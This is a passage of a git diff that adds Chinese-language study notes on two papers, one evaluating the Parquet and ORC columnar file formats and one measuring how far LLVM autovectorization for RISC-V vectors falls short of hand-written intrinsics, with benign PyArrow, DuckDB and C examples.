放一箱。做聚合分析时只搬需要的箱子,还能对整箱数据做**字典编码**(把「苹果/香蕉」映射成 0/1)、**游程编码**(连续 100 个相同值只存一次)——省空间、CPU 向量化友好。 + +Parquet(Twitter/Cloudera,2013)和 ORC(Meta,2013)就是数据湖/数仓里两种最流行的「打包规范」。它们诞生于 Hadoop 时代,默认开着 Snappy 块压缩,为 MapReduce 生态设计。十年过去,NVMe 带宽从 MB/s 涨到 GB/s,工作负载从 BI 报表扩展到 ML 特征表、向量检索、GPU 解码——**当年的默认选项还合理吗?** + +这篇 **VLDB 2023** 论文(Tsinghua + CMU + Voltron Data 的 Wes McKinney 等)不比较 Spark vs Presto 谁更快,而是**把格式本身拆开**,用真实数据分布驱动的 benchmark 逐项压测 Parquet 与 ORC,给出面向下一代格式的设计清单。开源代码:https://github.com/XinyuZeng/EvaluationOfColumnarFormats + +--- + +## 是什么 + +**目标**:在隔离格式内部设计的前提下,系统评估 Parquet 与 ORC 在**空间效率**、**解码速度**、**谓词下推**、**宽表投影**、**ML 工作负载**、**GPU 解码**上的表现,并提炼可复用的设计原则。 + +**不评估什么**:Apache Arrow(内存列式交换格式,非长期磁盘存储);Delta Lake / Iceberg / Hudi(表格式元数据层,不改底层 Parquet/ORC 文件布局)。 + +**核心贡献**: + +1. 建立 Parquet/ORC **特性分类法**(布局、编码、压缩、类型系统、索引、嵌套模型)。 +2. 从 Tableau BI、ClickHouse 样例、UCI-ML、Yelp、SEC 日志、Geonames、IMDb 等真实数据集提取列属性,构建可配置 benchmark。 +3. 在 AWS i3(NVMe)、S3、GPU(cuDF)上跑对照实验,总结 8 条面向未来的 Lesson。 + +--- + +## 为什么重要 + +如果你已经在用 Spark、DuckDB、Snowflake 外部表或 Hugging Face Parquet 数据集,底层几乎一定是 Parquet 或 ORC。格式层面的一个默认(比如「所有列开 Snappy」「RLE 阈值硬编码为 8」)会在**每一张表、每一次扫描**上被放大。 + +论文的关键语境变化: + +| 2013 年假设 | 2023 年现实 | +|-------------|-------------| +| 磁盘 I/O 是瓶颈 | NVMe / 云存储带宽极高,**CPU 解码**常成瓶颈 | +| BI 宽表扫描为主 | ML 需要**数千列特征**的子集投影 | +| 结构化 OLAP | 向量 embedding、图片二进制、top-k 相似度检索 | +| CPU 单线程解码 | GPU(RAPIDS cuDF)需要**可并行**的编码块 | + +论文结论之一:**Parquet 与 ORC 没有绝对赢家**——Parquet 文件略小、解码更快;ORC 在细粒度 zone map 下选择性查询更强。选格式不如理解 trade-off,并在写入时调参。 + +--- + +## 核心概念 + +### 1. PAX 混合列存布局 + +两种格式都采用 **PAX(Partition Attributes Across)**: + +``` +表 + └── Row Group / Stripe(水平切分) + ├── Column Chunk 1(整列的一段) + ├── Column Chunk 2 + └── ... + └── Page(Parquet 最小压缩/zone map 单元) +``` + +- **Parquet**:Row Group 按**行数**切(实验默认 100 万行)→ 宽表时单个 Row Group 内存 footprint 大。 +- **ORC**:Stripe 按**物理大小**切(默认 64 MB)→ 宽表时每个 Stripe 行数变少,向量化 batch 可能不够大。 + +文件末尾有 **Footer**(schema、Row Group 偏移、zone map 统计),读文件往往要先读 footer——在 S3 上意味着多次 round-trip。 + +### 2. 轻量编码 vs 块压缩(两层压缩) + +**第一层 — 轻量编码**(按列、感知类型): + +| 技术 | 直觉 | +|------|------| +| Dictionary | 低基数列:存「值→整数 ID」字典 + ID 序列 | +| RLE | 连续重复值:存 `(值, 重复次数)` | +| Bit-packing | 小整数 ID 按 bit 宽度打包 | +| Delta / FOR | 有序或近似有序整数:存差分或帧参考 | + +**第二层 — 块压缩**(Snappy/zstd 等,把已编码列块当字节流再压): + +论文 **5.4 节**核心发现:在现代 NVMe 上,列已被轻量编码后,Snappy/zstd **空间收益有限**,解码开销可达 **4.2×**;只有慢速 EBS(st1)或带宽极贵的场景才划算。**默认开 Snappy 可能是 2013 年的最优,不是 2023 年的最优。** + +### 3. Parquet vs ORC 编码策略差异 + +| 维度 | Parquet | ORC | +|------|---------|-----| +| 字典编码 | **默认对所有列**(含整数、浮点),字典满 1MB 回退 plain | 主要对字符串;整数列看 **NDV 比例**(默认 >0.8 不用字典) | +| 整数二次编码 | Dictionary → **RLE(重复≥8)+ Bitpack** | **四种算法贪心切换**:RLE(≥3)、Delta、Bitpack、PFOR | +| 解码复杂度 | 低,分支预测友好 | 高,论文测得分支误判约为 Parquet 的 **3×** | +| 浮点 | 字典编码(NDV 低时极有效) | 通常 **plain 存原始 float** → 文件大但解码快 | + +**真实数据关键事实**(论文 Figure 5):超过 **80% 整数列**、**60% 字符串列** 的 NDV 比例 < 0.01——字典编码对绝大多数列都值回票价。 + +### 4. Zone Map 与 Bloom Filter + +**Zone map**:每个 zone 存 `(min, max, null_count)`。查询 `WHERE price < 100` 时,若 zone 的 min > 100,整段跳过。 + +| | Parquet | ORC | +|---|---------|-----| +| 最细 zone | Page(~1MB,可选 PageIndex) | Row Index(默认 **每 1 万行**) | +| Bloom Filter 粒度 | 列块级(PageIndex 可选时更细) | 与最小 zone 对齐 | + +**geo 工作负载**(高 NDV、低选择性):ORC 选择性查询优于 Parquet,正因 zone 更细。但 ORC 的 zone map 分散在各 Stripe footer,在 **S3 上 top-k 检索**会发约 **4× GET** 于 Parquet(元数据集中 vs 分散)。 + +### 5. 嵌套数据:Dremel vs Length/Presence + +JSON 风格的嵌套结构两种建模: + +- **Parquet(Dremel)**:每个**原子字段**一列,附带 **Repetition Level / Definition Level** 两个整数流描述 list/struct/null。 +- **ORC**:每个 optional 字段有 **presence 位图**,每个 repeated 字段有 **length 列**。 + +Parquet 读 leaf 列更少;ORC 对 struct/list 中间节点显式建列。深度嵌套时 Parquet 文件更小,ORC 转 Arrow 更慢。 + +### 6. Benchmark 工作负载(论文 §4) + +从真实数据提取五类预设 workload: + +| 名称 | 来源倾向 | 特点 | +|------|----------|------| +| bi | Tableau 公开 BI | 高选择性扫描 | +| classic | IMDb, Yelp | 字符串多、Zipf 长尾 | +| geo | Geonames | 低选择性、细 zone map 受益 | +| log | SEC 日志 | 浮点多、排序度高 | +| ml | UCI-ML | 宽表、特征投影 | + +列属性参数:**NDV 比例**、**NULL 比例**、**值域**、**局部有序度**、**Zipf 偏斜**。用户可通过配置文件 + 生成器复现实验(Figure 4 流程)。 + +--- + +## 主要实验发现(速览) + +### 总体:没有单一赢家 + +- **文件大小**:互有胜负。Parquet 在 log/ml(低 NDV 浮点)更小;ORC 在 classic/geo(字符串为主)更小。 +- **全表扫描**:Parquet 普遍更快(轻量整数编码)。 +- **选择性查询**:geo 上 ORC 更快(细 zone map)。 + +### 编码与解码 + +- 低 NDV 整数:Parquet 字典 + bitpack 压缩更好。 +- 高有序度整数:ORC 的 Delta/FOR 更好。 +- **RLE 阈值**:Parquet 硬编码 **8**,ORC **3**;短游程时 RLE 解码比 bitpack 慢,但压缩更好(Figure 9)。 +- 浮点全表扫描:ORC 不解码字典,**解码时间**反而优于 Parquet——I/O 在现代 SSD 上已不是瓶颈。 + +### ML 与向量 + +- **宽表投影**(Figure 11):特征列从 200 增到 8000,**元数据解析时间线性涨**,即使只投影 10 列——Footer 里 Thrift/Protobuf schema 只能顺序解析。 +- **向量 embedding**(Figure 16):Parquet/ORC 压缩比接近 1(几乎压不动);Zarr 扫描开销更小(网格 chunk 并行)。 +- **Top-k + 回表**(LAION-5B,Figure 17):本地 SSD 上 ORC 选择快;**S3 上 Parquet 胜**(更少小范围 GET)。 + +### GPU(cuDF,§5.9) + +- CPU 上「少压缩、快解码」;GPU 上 **PCIe + 磁盘 I/O 主导**,**zstd 块压缩反而提升吞吐**。 +- Parquet/ORC 的变长 RLE+bitpack 子序列 **难以在 warp 内并行**——GPU 利用率低。未来格式需要**块内可并行**的编码。 + +--- + +## 八条面向未来的 Lesson(论文 §6 浓缩) + +1. **字典编码应继续作为默认策略**(含浮点)——真实列 NDV 普遍很低。 +2. **解码路径保持简单**——运行时在多 codec 间切换有显著开销。 +3. **块压缩不应默认开启**——除非存储成本或网络带宽是真正瓶颈(GPU 场景例外)。 +4. **元数据应集中、可随机访问**——服务 ML 宽表与云对象存储的低延迟读取。 +5. **可嵌入更丰富的索引**(column index、range filter)——存储便宜,用空间换 CPU。 +6. **嵌套模型应贴近内存格式(Arrow)**——减少转码开销。 +7. **ML 需要:宽表投影、低选择性检索、大二进制与结构化数据分区存放、向量专用浮点压缩。** +8. **GPU 友好 = 文件级并行块 + 块内可并行编码。** + +--- + +## 代码示例 1:用 PyArrow 写入 Parquet 并观察编码选择 + +下面演示**同一列数据**在「低 NDV(适合字典)」与「高 NDV(字典失效回退 plain)」下的文件大小差异——对应论文关于 Parquet 默认字典编码的核心论点。 + +```python +import pyarrow as pa +import pyarrow.parquet as pq +import os + +n = 1_000_000 + +# 低 NDV:只有 10 个 distinct city,NDV ratio = 10/n +low_ndv = pa.table({"city": pa.array(["Beijing"] * (n // 10) + ["Shanghai"] * (n // 10) + + [f"C{i}" for i in range(8) for _ in range(n // 80)])}) + +# 高 NDV:每行唯一 UUID 风格字符串,NDV ratio ≈ 1 +high_ndv = pa.table({"id": pa.array([f"user-{i:08d}" for i in range(n)])}) + +for name, table in [("low_ndv", low_ndv), ("high_ndv", high_ndv)]: + path = f"/tmp/{name}.parquet" + pq.write_table( + table, + path, + compression="SNAPPY", # 论文:默认 Snappy 在现代硬件上常不划算 + use_dictionary=True, # Parquet 默认对各类列尝试字典 + write_statistics=True, # 写入 zone map(min/max)供谓词下推 + row_group_size=1_000_000, # 论文实验默认 1M 行 / row group + ) + print(f"{name}: {os.path.getsize(path) / 1024 / 1024:.2f} MB") + +# 读取 metadata,查看实际采用的编码 +meta = pq.read_metadata("/tmp/low_ndv.parquet") +rg = meta.row_group(0) +col = rg.column(0) +print("low_ndv encoding:", col.statistics) # 可进一步用 col.encodings() 查看 +``` + +**预期直觉**:`low_ndv` 文件应远小于 `high_ndv`;后者字典页填满后大量值以 plain 存储,体积接近原始字符串长度。生产环境可尝试 `compression="NONE"` 或 `ZSTD` 级别 1,对照论文 Figure 8 在 NVMe 上的扫描延迟。 + +--- + +## 代码示例 2:用 DuckDB 对 Parquet 做选择性扫描(zone map 下推) + +DuckDB 读取 Parquet 时会利用 **footer 中的列统计信息**跳过 Row Group,对应论文 §5.6 的 select + late materialization 讨论。需先 `pip install duckdb pyarrow`。 + +```python +import os +import duckdb +import pyarrow as pa +import pyarrow.parquet as pq +import datetime + +# 生成 100 万行 BI 风格数据:date 列有一定有序度(利于 zone map) +n = 1_000_000 +base = datetime.date(2020, 1, 1) +dates = pa.array([base + datetime.timedelta(days=i % 365) for i in range(n)]) +amounts = pa.array([i % 1000 for i in range(n)]) +table = pa.table({"dt": dates, "amount": amounts}) +path = "/tmp/bi_sample.parquet" +pq.write_table(table, path, compression="SNAPPY") + +con = duckdb.connect() +con.execute(f"CREATE VIEW sales AS SELECT * FROM read_parquet('{path}')") + +# 高选择性:扫描大部分 row group +high_sel = con.execute(""" + SELECT SUM(amount) FROM sales + WHERE dt BETWEEN DATE '2020-06-01' AND DATE '2020-12-31' +""").fetchone() + +# 低选择性:仅匹配极少数 row(zone map 可跳过更多块) +low_sel = con.execute(""" + SELECT SUM(amount) FROM sales + WHERE dt = DATE '2020-01-01' +""").fetchone() + +print("high selectivity sum:", high_sel[0]) +print("low selectivity sum:", low_sel[0]) + +# EXPLAIN 可查看是否 pushdown(版本不同输出略有差异) +print(con.execute("EXPLAIN SELECT * FROM sales WHERE dt = DATE '2020-01-01'").fetchdf()) +``` + +**论文启示**:低选择性查询在 Parquet 上能否加速,取决于 **PageIndex / Row Group 统计**是否启用、**date 列是否在文件中有序聚簇**。若 date 完全随机,zone map 几乎无效——这与 Lesson 5「索引要匹配数据分布」一致。 + +--- + +## 代码示例 3(补充):对比「开/关块压缩」的扫描成本 + +```python +import os +import pyarrow as pa +import pyarrow.parquet as pq +import time + +n = 1_000_000 +table = pa.table({ + "k": pa.array([i % 500 for i in range(n)]), # 低 NDV 整数 + "s": pa.array([f"tag-{i % 50}" for i in range(n)]), +}) + +for comp in ["NONE", "SNAPPY", "ZSTD"]: + path = f"/tmp/core_{comp}.parquet" + pq.write_table(table, path, compression=comp, row_group_size=n) + size_mb = os.path.getsize(path) / 1024 / 1024 + + t0 = time.perf_counter() + _ = pq.read_table(path) + elapsed = time.perf_counter() - t0 + print(f"{comp:6s} size={size_mb:5.2f}MB read={elapsed:.3f}s") +``` + +在 NVMe 上你往往会看到:**NONE 读最快、体积未必最大**(因轻量编码已压缩);ZSTD 体积最小但解码最慢——复现论文 Figure 8 的 CPU vs I/O trade-off。 + +--- + +## 与 Lakehouse / Arrow 的关系 + +- **Lakehouse**(Delta/Iceberg/Hudi)在 Parquet 之上加**事务日志、快照、分区演进**——解决的是「哪几个文件组成表 version N」,不是「列块如何编码」。 +- **Arrow** 是进程间**零拷贝/少拷贝**内存列格式;Parquet → Arrow 解码是分析查询的常规路径。论文刻意分开测「格式原生扫描」,避免 Parquet 与 Arrow 紧耦合造成 ORC 对比不公平。 + +读 Lakehouse 笔记时把本文当作**底层文件格式层**的补充:表格式选 Iceberg 不改变「仍建议默认字典、谨慎 Snappy」的结论。 + +--- + +## 实践建议(写 Parquet/ORC 的生产 checklist) + +1. **先看列 NDV**:BI/日志列多数低 NDV → 保持字典;高基数 ID 列考虑 ORC 式 NDV 阈值或关闭字典。 +2. **块压缩**:NVMe / 本地 SSD 分析集群可试 **`compression=NONE` 或 ZSTD level 1** 做 A/B;S3 冷数据、带宽贵时可保留 zstd。 +3. **Row Group 大小**:窄表用大 row group(100 万行);**含大 blob(图片)** 时用较小 row group 提高并行读(论文 Figure 18),结构化列与 blob **分区存放**更好。 +4. **谓词列**:低选择性查询靠 **PageIndex(Parquet 2.x)** 或 ORC Row Index;确保写入时 `write_statistics=True`。 +5. **ML 宽表**:数千特征列时,关注 **footer 解析**成本;考虑按特征组分文件、或等 F3 等下一代格式。 +6. **向量列**:Parquet list 非最优;大规模 embedding 可评估 **Zarr / 专用向量库 + 外表 Parquet 元数据**。 +7. **GPU 管道**:若走 RAPIDS/cuDF,**更 aggressive 的块压缩**可能反而有利——与 CPU 结论相反。 + +--- + +## 局限与后续工作 + +- 实验主要基于 **Arrow 9.0 / ORC 1.8 / 2023 年**实现;Parquet PageIndex、Bloom Filter 在 C++ 侧支持仍在演进。 +- 未涵盖 **BtrBlocks、Capacitor、Alpha、F3** 等新格式(作者后续 SIGMOD'26 有 F3 工作)。 +- 对比 ORC 时未测「ORC 原生 reader 最优路径」,部分结论针对 **转 Arrow / 通用扫描** 场景。 + +--- + +## 一句话总结 + +Parquet 和 ORC 都是 2013 年 Hadoop 时代的杰作;在 **NVMe + ML + 云对象存储 + GPU** 的今天,**没有格式全胜**——真实列普遍低 NDV 使**字典编码仍应是默认**,**简单解码胜过复杂压缩**,**块压缩不应无脑默认**,**元数据与索引粒度**要匹配工作负载(BI 扫描 vs geo 点查 vs ML 宽表 vs 向量 top-k)。这篇论文的价值在于:用可复现 benchmark 把「格式迷信」变成「可度量 trade-off」,为 F3 等下一代开放格式铺路。 + +--- + +## 延伸阅读 + +- 论文扩展版:https://arxiv.org/pdf/2304.05028 +- Artifact:https://github.com/XinyuZeng/EvaluationOfColumnarFormats +- 同团队后续:**F3**(SIGMOD 2026 Best Paper Honorable Mention)、**NULLS!**(DaMoN 2024)、**LeCo** 学习型压缩(SIGMOD 2024) +- 表格式层:本仓库 [Lakehouse 2021 笔记](./lakehouse-2021.md) diff --git a/src/content/docs/papers/compiler-perf-left-on-table.md b/src/content/docs/papers/compiler-perf-left-on-table.md new file mode 100644 index 000000000..7f71e9bf6 --- /dev/null +++ b/src/content/docs/papers/compiler-perf-left-on-table.md @@ -0,0 +1,325 @@ +--- +title: Performance Left on the Table — 编译器自动向量化还剩多少性能没吃到 +来源: 'Neil Adit & Adrian Sampson, "Performance Left on the Table: An Evaluation of Compiler Autovectorization for RISC-V", IEEE Micro, 2022 (DOI: 10.1109/MM.2022.3184867)' +日期: 2026-06-13 +子分类: 类型与 PL 理论 +分类: 编程语言 +provenance: pipeline-v3 +--- + +## 从日常类比开始:自动挡 vs 手动挡 + +想象你买了一辆带「运动模式」的新车,销售说引擎能输出 300 马力。你平时只用 D 挡通勤,仪表盘永远显示 150 马力——不是车坏了,而是**自动挡的换挡逻辑**没把你踩到底的油门完全翻译到轮子上。 + +写 C/C++ 程序时,编译器的 **autovectorization(自动向量化)** 就像这辆车的 D 挡:理论上 CPU 有 SIMD/向量单元(一次处理 4、8、16 个数据),编译器应该把标量循环改写成向量指令;但大量 benchmark 显示,**手写 intrinsics 的「手动挡」版本**往往比 `-O3` 自动向量化快一截,甚至快数倍。论文标题 *Performance Left on the Table* 说的就是:**桌上还摆着性能,编译器没帮你端起来**。 + +Adit & Sampson 在 RISC-V Vector Extension(RVV)和 LLVM 15 上做了系统测量,对比三种配置: + +| 配置 | 含义 | +|------|------| +| Scalar | 纯标量,关闭向量化 | +| Hand-vector | 程序员用 RVV intrinsics 手写向量代码 | +| Autovector | 只写标量循环,交给 `clang -O3` 自动向量化 | + +核心问题不是「向量化有没有用」(有用,TSVC 里常见 6–7× 指令数下降),而是 **length-agnostic ISA(长度无关向量 ISA)** 上的编译器支持,仍明显落后于 AVX-512 等固定宽度 ISA——以及即使向量化成功,和手写之间仍有 gap。 + +--- + +## 是什么 + +**Performance Left on the Table** 是一篇 **empirical compiler evaluation(实证编译器评估)** 论文,聚焦 **LLVM 对 RISC-V RVV 的 autovectorization 成熟度**,并与 **Intel AVX-512** 对照。 + +研究分两路: + +1. **合成循环(TSVC)**:151 个经典向量化测试 loop,看 LLVM 在 RVV-VLS(编译期固定向量宽)与 RVV-VLA(向量长度在运行时由硬件决定)下各能 vectorize 多少。 +2. **真实应用(RiVec benchmark suite)**:已有 RVV 手写实现的 PARSEC / Rodinia / PolyBench 程序,量化 autovector 与 hand-vector 的 **dynamic instruction count speedup** 差距,并通过**受控源码变换**模拟「若编译器/编程模型改进 X,gap 能缩小多少」。 + +论文产出 **Table 1:改进提案清单**,按难度标注为工程修复 (E)、编译器研究 (C)、编程模型研究 (P)——相当于给 RVV/SVE 生态的 roadmap。 + +--- + +## 为什么重要 + +### 1. 向量 ISA 正在换代 + +传统 **fixed-length SIMD**(x86 AVX、ARM Neon)把向量宽写死在 ISA 里:换一代 CPU 可能要重编译或改 intrinsics。新一代 **length-agnostic / scalable vector ISA**——**RISC-V RVV**、**ARM SVE**——用 `vsetvl` 等在运行时适配硬件向量长度,**同一份二进制**可在不同 core 上跑。但若编译器 autovector 跟不上, portability 的代价就是 **performance left on the table**。 + +### 2. 手写 intrinsics 不可持续 + +Hand-vector 要求程序员: + +- 理解 `vsetvl` stripmining、mask、segment load/store; +- 处理 tail loop(剩余元素不足一个向量宽); +- 为每种数据宽度、每种 libm 函数单独调优。 + +Autovector 的理想是:**写可读的标量循环,编译器生成接近手写的 RVV**。论文用数据说明:这个理想在 2022 年的 LLVM 上**部分成立**(Streamcluster、Jacobi-2D),**部分彻底失败**(Blackscholes 在 RVV 上 autovector 零加速)。 + +### 3. 对「编译器已经够聪明」的纠偏 + +工业界常见心态:「开 `-O3` 就行了」。论文用 RiVec 表明:**math lib 调用、指针别名、动态向量长度、shuffle 代价未建模** 等具体问题,会让 `-O3` 在关键 loop 上**完全放弃向量化**。这不是抽象讨论,而是可复现的 instruction count 和变换实验。 + +--- + +## 核心概念 + +### 1. Autovectorization(自动向量化) + +编译器分析 loop 的 **data dependence(数据依赖)** 和 **memory access pattern(访存模式)**,若相邻迭代可并行,则生成 SIMD/向量指令,一次处理多个 lane。 + +**必要条件(简化)**: + +- Loop 内无 **loop-carried dependence** 阻碍(或 dependence distance ≥ vector length); +- 编译器能证明 **pointer aliasing(指针别名)** 不破坏语义; +- 无编译器无法 vectorize 的 **call**(如 scalar `log10`)。 + +### 2. RVV-VLS vs RVV-VLA + +| 模式 | LLVM 标志 | 含义 | +|------|-----------|------| +| RVV-VLS | `-riscv-v-vector-bits-min=N` | 编译期假定向量宽为 N bit,类似传统 SIMD | +| RVV-VLA | `-scalable-vectorization=on` | 向量长度运行时才知道,IR 中用 **scalable vector type** | + +论文发现:VLS 比 VLA **多 vectorize 13 个 TSVC loop**,因为有些 pass 需要 **compile-time fixed vector length**(例如 SLP vectorization、某些 stride load 模式)。VLA 后端往往退化为更通用的 `vluxei`(indexed gather),而 VLS 可选更高效的 `vlse`(strided load)。 + +### 3. Instruction count speedup + +论文主指标: + +```text +speedup_c = (scalar 动态指令数) / (配置 c 的动态指令数) +``` + +在 gem5(RVV)或 perf(AVX-512)上测 **dynamic instruction count**,不是 wall-clock——便于隔离「编译器生成了多少指令」,但仍与真实性能强相关。 + +### 4. 性能 gap 的六大来源(RiVec 总结) + +论文 Table 1(B) 归纳 autovector 落后于 hand-vector 的主因: + +1. **Vector math library 缺失**:RVV 没有像 AVX-512 那样接 `-fveclib=libmvec`,loop 里的 `exp`/`log` 阻断向量化。 +2. **Vector-scalar width mismatch**:RV64 上标量 promoted 到 i64,向量仍是 i32,插入大量 width conversion。 +3. **Dynamic vector length scalability**:Autovector 只用 max hardware vector length + scalar epilogue;手写用 `vsetvl` stripmine,tail 更高效。 +4. **Shuffle pattern detection**:VLA 下 gather offset / shuffle mask 无法在 IR 里写成固定数组,后端选指令保守。 +5. **Memory aliasing & access pattern**:编译器未识别 reuse,重复 load/store。 +6. **Algorithmic structure**:需 loop fusion、interchange 等源码级变换才可向量化——属编程模型问题。 + +--- + +## 代码示例 1:strided access — VLS 能 vectorize,VLA 选指令更差 + +TSVC 类 loop(论文 synthetic study): + +```c +// 每隔一个元素写 a[i] = a[i-1] + b[i] +for (int i = 0; i < N; i += 2) { + a[i] = a[i - 1] + b[i]; +} +``` + +**零基础怎么读**: + +- 这是 **strided(跨步)访存**:不是连续 `a[i]`、`a[i+1]`,而是步长 2。 +- **RVV-VLS** 后端可选 **strided load (`vlse`)**——硬件直接按步长取数。 +- **RVV-VLA** 因 IR 里 offset 不能写成「长度固定的数组」,常退化为 **indexed gather (`vluxei`)**——更通用、往往更慢。 + +**启示**:不是 loop「本质上不能向量化」,而是 **length-agnostic IR 表示不完整** 导致后端保守。论文建议:**Standardize IR representation for gather offsets and shuffle masks**(Table 1-A,难度 C)。 + +--- + +## 代码示例 2:Blackscholes — 一个 `log10` _CALL 毁掉整条 loop + +Blackscholes 期权定价核心类似: + +```c +for (int i = 0; i < numOptions; i++) { + float price = ...; // 若干算术 + float log_val = log10(price); // ← scalar libm call + result[i] = some_formula(price, log_val); +} +``` + +**现象(论文 Figure 1a,未修改 benchmark)**: + +| 配置 | 相对 scalar 的指令 speedup | +|------|---------------------------| +| Hand-vector (RVV) | ~6.8× | +| Autovector RVV-VLA / VLS | **~1×(无加速)** | +| Autovector AVX-512 + libmvec | **~9.3×** | + +RVV 上 LLVM **无法把 `log10` 换成向量 math 库**,整个 inner loop 保持标量。AVX-512 有 GLIBC vector math,autovector 反而很强。 + +**受控实验**:把 hand-vector 和 autovector 版本里的 math 函数都改成 **no-op**,再比 speedup——Blackscholes 的 gap **完全消失**,autovector 甚至略超 hand-vector(~11× vs ~6.8×),说明 **compute pattern 本身编译器能优化得很好**,瓶颈在 **libm**。 + +```c +// 论文式「factor out math」变换(概念示意) +#define log10(x) ((void)(x), 0.0f) // 仅用于测量 gap,非生产代码 +``` + +**启示**:**Engineering fix (E)** —— 为 RISC-V 提供 **vectorized libm** 并接 `-fveclib`,可能一次性解锁大量科学计算 loop。 + +--- + +## 代码示例 3:动态向量长度 — 手写 stripmine vs 编译器 epilogue + +**Hand-vector(RVV intrinsics 风格)**: + +```c +#include + +void saxpy(size_t n, float a, const float *x, float *y) { + size_t vl; + for (size_t i = 0; i < n; i += vl) { + vl = __riscv_vsetvl_e32m1(n - i); // 每次取当前硬件允许的长度 + vfloat32m1_t vx = __riscv_vle32_v_f32m1(&x[i], vl); + vfloat32m1_t vy = __riscv_vle32_v_f32m1(&y[i], vl); + vy = __riscv_vfmacc_vf_f32m1(vy, a, vx, vl); + __riscv_vse32_v_f32m1(&y[i], vy, vl); + } +} +``` + +**Autovector 近似生成的控制流(论文 pseudocode)**: + +```c +int max_hwl = read_csr_vlen(); // 固定用最大硬件向量宽 +for (int i = 0; i < N; i += max_hwl) { + if ((N - i) < max_hwl) { + // scalar epilogue:尾部不足一个向量宽时逐元素标量处理 + for (int j = i; j < N; j++) + y[j] += a * x[j]; + } else { + // 向量主体 + ... + } +} +``` + +Streamcluster 的 `dist` 函数:autovector **指令数反而优于** hand-vector,因为手写版在 loop 内为 dynamic VL 加了额外 **vector control 指令**,而 autovector 生成的固定宽度主体更「干净」。但在 tail 占比高的 workload 上,**缺少 vsetvl 式 stripmine** 会浪费向量 lane。 + +**启示**:LLVM 应支持 **dynamic vector length scalability (C)**——在 autovector 代码里生成 `vsetvl` 循环,而非 max-width + scalar epilogue。 + +--- + +## 代码示例 4:指针别名 — 编译器「不敢」向量化 + +Stack Overflow / 社区长期讨论的经典模式(与论文 **Jacobi-2-D / Pathfinder 变换** 同类): + +```c +struct Buffer { + size_t size; + double *data; +}; + +void add1(Buffer *this, const Buffer *other) { + for (size_t i = 0; i < this->size; i++) + this->data[i] += other->data[i]; // 编译器担心 data[i] alias 到 &size +} +``` + +在 strict aliasing 下,若 `data` 理论上可指向 `&this->size`,编译器必须假设 **`this->size` 每次迭代可能被写**,无法把 trip count hoist,也无法向量化。 + +**论文中的修复(Table 2)**: + +- `restrict` 指针,或 +- 简化 2-D 访存为 1-D 连续访问, +- 明确 non-aliasing memory。 + +```c +void add1_restrict(double * restrict data, size_t n, const double * restrict other) { + for (size_t i = 0; i < n; i++) + data[i] += other[i]; +} +``` + +变换后 Jacobi-2-D、Pathfinder 的 autovector 接近 hand-vector,但仍可能因 **未识别 data reuse** 而多几次冗余 load。 + +--- + +## 实验结果速览 + +### TSVC(151 loops,vector length = 8) + +- RVV-VLS 与 RVV-VLA **共同向量化** 82 个 loop,几何平均指令 speedup 约 **7× / 6.3×**。 +- **仅 VLS 能向量化** 的额外 13 个 loop → VLA 编译器/IR 待补完。 +- 议题:dependence analysis 需 **runtime vector length speculation**、SLP 需 **multilength 版本**、reduction 需在 loop 里做 vector register reduction。 + +### RiVec(7 个应用,Figure 1) + +**未修改源码**: + +| Benchmark | Autovector 表现摘要 | +|-----------|---------------------| +| Streamcluster | Autovector ≥ hand-vector(dist 规律访存 + reduction) | +| Blackscholes | RVV autovector **无加速**(libm) | +| Jacobi-2-D, Pathfinder | 有加速,但不如 hand-vector(reuse / alias) | +| Particle filter, Swaptions | 关键段未向量化,接近 scalar | + +**Table 2 变换后(Figure 1b)**:skip math、loop fusion、restrict 等组合可 **大幅 closure gap**;Swaptions 除 math 外仍需 inline、loop interchange 等。 + +--- + +## 与更广的「性能留在桌上」 + +候选语料里把话题扩展到 **PGO、LTO、autovector 盲区**——与本论文一致的精神: + +| 技术 | 「留在桌上」的典型原因 | +|------|------------------------| +| **Autovector** | alias、libm、dynamic VL、shuffle 代价 | +| **PGO** | 未采集代表性 profile;CI 未链 LTO+PGO | +| **LTO** | 跨 TU 边界 inlining / vectorization 仍受 IR 限制 | +| **Auto-parallel** | OpenMP 缺 `simd` / `declare simd` 提示 | + +论文的方法论可复用:**(hand-opt baseline) − (autovector) = gap**,再 **受控变换** 归因到具体 pass 缺失。 + +--- + +## 改进路线图(Table 1 精简) + +**A. 合成 loop / IR 层面** + +- 标准化 length-agnostic gather/shuffle IR **(C)** +- Runtime vector-length-based dependence analysis **(E)** +- Multilength SLP **(E)** +- Vector reduction in dynamic loop **(E)** + +**B. 应用 benchmark 层面** + +- RISC-V vector math library **(E)** ← 高 ROI +- Infer scalar width from vector types **(C)** +- Dynamic VL in autovector output **(C)** +- Shuffle cost model for RVV backend **(C)** +- Algorithmic loop fusion **(P)** + +--- + +## 零基础实践清单 + +1. **看编译器有没有向量化**:`clang -O3 -Rpass=loop-vectorize -Rpass-missed=loop-vectorize foo.c` +2. **对比汇编**:`llvm-objdump -d` 或 Compiler Explorer,搜 `vle`/`vse`(RVV)或 `vmovups`(x86)。 +3. **排除 libm 阻断**:临时替换 math 调用或链接 vector libm(x86 上试 `-fveclib=libmvec`)。 +4. **帮助 alias 分析**:`restrict`、`-fno-strict-aliasing`(仅诊断用,生产慎用)、结构体拆分 pointer 与 length。 +5. **显式提示**:OpenMP `#pragma omp simd`、Clang `__attribute__((assume_aligned))`。 +6. **仍不够再 intrinsics**:与论文结论一致——hand-vector 是现状下的性能上限参考。 + +--- + +## 局限与后续工作 + +- 指标是 **dynamic instruction count**,未涵盖 cache、分支预测、向量单元占用率;Blackscholes 上 autovector 去掉 math 后 **优于** hand-vector 仅说明「指令更省」,真实 wall-clock 还看 libm 实现。 +- 评估锁定 **LLVM 15 + gem5**;2024–2026 的 LLVM 对 RVV 持续演进,需重新跑 RiVec/TSVC 验证 gap 是否缩小。 +- 后续研究如 **VecTrans(LLM 辅助改写 TSVC 以触发 Clang 向量化)** 说明:gap 的一部分可通过 **源码变换 + 编译器** 联合关闭,而不只靠后端 patch。 + +--- + +## 一句话总结 + +**Performance Left on the Table** 用 RISC-V RVV 证明:在 length-agnostic 向量时代,**编译器 autovectorization 仍系统性弱于 fixed-width ISA 上的成熟度,也弱于手写 intrinsics**——主因是 vector libm、VLA IR/后端、dynamic vector length、alias 与访存模式,而非「向量化理论不适用」。性能不是不存在,而是 **留在桌上**;工程上优先补 vector math 与 alias 友好写法,往往比换 CPU 更便宜。 + +--- + +## 延伸阅读 + +- RISC-V Vector Extension spec(RVV v1.0) +- ARM SVE autovectorization 对比研究(与 Neon/AVX 对照的 prior work) +- TSVC / TSVC 2 向量化测试套件 +- RiVec 